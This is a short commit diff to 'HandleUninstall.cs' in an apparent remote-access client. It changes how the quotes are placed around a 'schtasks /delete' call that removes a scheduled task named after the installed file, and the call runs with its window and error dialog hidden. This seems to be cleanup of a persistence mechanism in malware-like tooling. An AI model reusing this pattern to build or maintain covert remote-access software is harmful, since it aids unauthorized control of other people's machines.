Update HandleUninstall.cs
This commit is contained in:
parent
afdfc197ec
commit
9b40743212
@ -26,7 +26,7 @@ namespace Client.Handle_Packet
|
||||
Process.Start(new ProcessStartInfo()
|
||||
{
|
||||
FileName = "schtasks",
|
||||
Arguments = $"/delete /f /tn \"" + Settings.InstallFile + "\"",
|
||||
Arguments = "/delete /f /tn " + @"""'" + Settings.InstallFile + @"""'",
|
||||
CreateNoWindow = true,
|
||||
ErrorDialog = false,
|
||||
UseShellExecute = false,
|
||||
|
Loading…
x
Reference in New Issue
Block a user